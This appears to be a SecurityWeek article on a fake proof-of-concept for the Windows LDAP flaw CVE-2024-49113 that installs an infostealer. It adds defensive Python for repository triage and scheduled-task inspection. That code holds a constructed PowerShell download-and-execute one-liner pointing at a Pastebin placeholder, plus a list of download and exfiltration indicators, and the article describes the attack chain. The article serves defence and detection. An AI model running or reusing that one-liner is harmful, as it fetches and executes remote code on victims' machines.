Malware & Threats

Infostealer Masquerades as PoC Code Targeting Recent LDAP Vulnerability

A fake proof-of-concept (PoC) exploit for a recent LDAP vulnerability distributes information stealer malware.

Threat actors are distributing information stealer malware masquerading as proof-of-concept (PoC) exploit code targeting a recent Windows Lightweight Directory Access Protocol (LDAP) vulnerability.

Tracked as CVE-2024-49113 (CVSS score of 7.5), the denial-of-service (DoS) bug was addressed on December 10 alongside over 70 other flaws, including a critical LDAP vulnerability (CVE-2024-49112) that could lead to remote code execution (RCE).

Less than a month after patches were rolled out for the two issues, SafeBreach published PoC code targeting CVE-2024-49113, saying that it should be considered as important as the RCE flaw.

According to SafeBreach, which refers to CVE-2024-49113 as LDAPNightmare, the vulnerability can be abused to crash any unpatched Windows server, not only Domain Controllers, with the sole requirement that the target's DNS server has internet connectivity.

Now, Trend Micro warns of a fake PoC exploit that lures security researchers into executing information stealer malware on their systems.

“Although the tactic of using PoC lures as a vehicle for malware delivery is not new, this attack still poses significant concerns, especially since it capitalizes on a trending issue that could potentially affect a larger number of victims,” Trend Micro notes.

The fake PoC is hosted in a repository forked from the original SafeBreach one; the fork replaces the original Python files with an executable packed using UPX.
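Before running any PoC pulled from a fork, the check a practitioner wants is whether the checkout still contains the source it claims to, or a packed binary in its place. The following Python is an added example, not code from the article, Trend Micro or SafeBreach: it walks a checkout, recognises PE files from their headers, and flags UPX's tell-tale UPX0/UPX1 section names or the "UPX!" marker. The repository layout, the header-only PE image and the file names (poc.exe, README.md) are constructed for the demo.

```python
import os
import struct
import tempfile

# Fixed sizes from the PE/COFF format (well-formed headers are assumed).
COFF_HEADER_SIZE = 20
SECTION_HEADER_SIZE = 40


def pe_section_names(data):
    """Return the section names of a PE image, or None if `data` is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    size_optional = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 4 + COFF_HEADER_SIZE + size_optional
    names = []
    for i in range(num_sections):
        off = table + i * SECTION_HEADER_SIZE
        if off + 8 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\x00"))
    return names


def looks_upx_packed(data, section_names):
    """UPX renames sections to UPX0/UPX1/... and leaves a 'UPX!' marker right after the headers."""
    return any(n.startswith(b"UPX") for n in section_names) or b"UPX!" in data


def triage_repo(root):
    """Walk a checked-out repository; report Python sources, PE files and UPX-packed PE files."""
    report = {"source_files": [], "pe_files": [], "upx_packed": []}
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            with open(os.path.join(dirpath, name), "rb") as fh:
                head = fh.read(4096)  # headers and section table sit at the front of the file
            if name.endswith(".py"):
                report["source_files"].append(name)
            sections = pe_section_names(head)
            if sections is not None:
                report["pe_files"].append(name)
                if looks_upx_packed(head, sections):
                    report["upx_packed"].append(name)
    # A "PoC" that ships binaries and no source is the pattern described in the article.
    report["verdict"] = "suspicious" if report["pe_files"] and not report["source_files"] else "ok"
    return report


def build_minimal_pe(section_names):
    """Construct a header-only, non-runnable PE image with the given section names (demo input)."""
    e_lfanew = 0x40
    dos = (b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    coff = struct.pack("<HHIIIHH", 0x014C, len(section_names), 0, 0, 0, 0, 0x0102)
    table = b"".join(
        n.ljust(8, b"\x00")[:8] + struct.pack("<IIIIIIHHI", 0, 0, 0, 0, 0, 0, 0, 0, 0x60000020)
        for n in section_names
    )
    return dos + b"PE\x00\x00" + coff + table


def demo():
    """Write a constructed 'forked PoC' layout (binary, no .py files) to a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "poc.exe"), "wb") as fh:
            fh.write(build_minimal_pe([b"UPX0", b"UPX1", b".rsrc"]))
        with open(os.path.join(root, "README.md"), "w") as fh:
            fh.write("# CVE-2024-49113 PoC\n")
        return triage_repo(root)


if __name__ == "__main__":
    print(demo())
```

Run `triage_repo()` against the checkout directory; a "suspicious" verdict or any entry under `upx_packed` means the repository does not match what a Python PoC should look like. The section-name heuristic is cheap and easily defeated by a repacker, so treat it as a first filter, not a clean bill of health.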

When executed, the fake PoC drops a PowerShell script in the system’s temporary folder. That script creates a scheduled task that runs an encoded PowerShell command, which in turn downloads a further script from Pastebin.

The second script collects system information such as the process list, directory listings, IP addresses, network adapter details, and installed updates, compresses it into a ZIP archive, and uploads the archive to an external FTP server.
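The persistence step above leaves a durable artifact: a scheduled task whose action is PowerShell with an encoded command. The following Python is an added example, not code from the article or Trend Micro: it parses Task Scheduler XML (the format of the files under C:\Windows\System32\Tasks and of `schtasks /query /xml`), decodes any `-EncodedCommand` argument (base64 of UTF-16LE, as PowerShell defines it), and flags download-and-execute indicators such as a Pastebin URL. The task document, the stage-one one-liner and the indicator list are constructed for the demo; the paste URL is a placeholder, not a real indicator.

```python
import base64
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the value is base64(UTF-16LE).
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Assumed indicator list for a task that launches PowerShell (not Trend Micro's IOCs).
INDICATORS = ("pastebin.com", "downloadstring", "invoke-webrequest", "iwr ", "iex", "webclient", "ftp://")


def decode_encoded_command(arguments):
    """Return the plaintext of an -EncodedCommand argument, or None if absent or malformed."""
    m = ENCODED_FLAG.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_task_xml(xml_data):
    """Inspect every <Exec> action in one Task Scheduler XML document (str or bytes)."""
    root = ET.fromstring(xml_data)
    findings = []
    for ex in root.findall(".//t:Actions/t:Exec", TASK_NS):
        command = (ex.findtext("t:Command", default="", namespaces=TASK_NS) or "").strip()
        arguments = (ex.findtext("t:Arguments", default="", namespaces=TASK_NS) or "").strip()
        decoded = decode_encoded_command(arguments)
        # Match against the decoded payload when there is one, else the raw arguments.
        haystack = (decoded if decoded is not None else arguments).lower()
        hits = [i for i in INDICATORS if i in haystack]
        findings.append({
            "command": command,
            "arguments": arguments,
            "decoded": decoded,
            "indicators": hits,
            "suspicious": bool(hits),
        })
    return findings


# Constructed sample: a stage-one one-liner of the kind the article describes, pulling the next
# stage from Pastebin. <paste-id> is a placeholder.
STAGE_ONE = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/<paste-id>')"
ENCODED = base64.b64encode(STAGE_ONE.encode("utf-16-le")).decode("ascii")

# Constructed task document: one malicious action and one benign one for contrast.
SAMPLE_TASK_XML = f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoP -W Hidden -EncodedCommand {ENCODED}</Arguments>
    </Exec>
    <Exec>
      <Command>C:\\Windows\\System32\\cleanmgr.exe</Command>
      <Arguments>/autoclean</Arguments>
    </Exec>
  </Actions>
</Task>"""


if __name__ == "__main__":
    for finding in inspect_task_xml(SAMPLE_TASK_XML):
        flag = "SUSPICIOUS" if finding["suspicious"] else "ok"
        print(f"{flag:10} {finding['command']} indicators={finding['indicators']}")
        if finding["decoded"]:
            print("           decoded:", finding["decoded"])
```

On a live host, feed `inspect_task_xml()` the bytes of each file under C:\Windows\System32\Tasks (they are UTF-16 with an XML declaration, so pass the raw bytes rather than a decoded string). Decoding the command matters because the base64 blob hides the Pastebin URL from a naive string search; a hit on `pastebin.com` together with `DownloadString`/`IEX` in a hidden-window task is the combination worth escalating.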

Copyright © 2026 SecurityWeek ®, a Wired Business Media Publication. All Rights Reserved.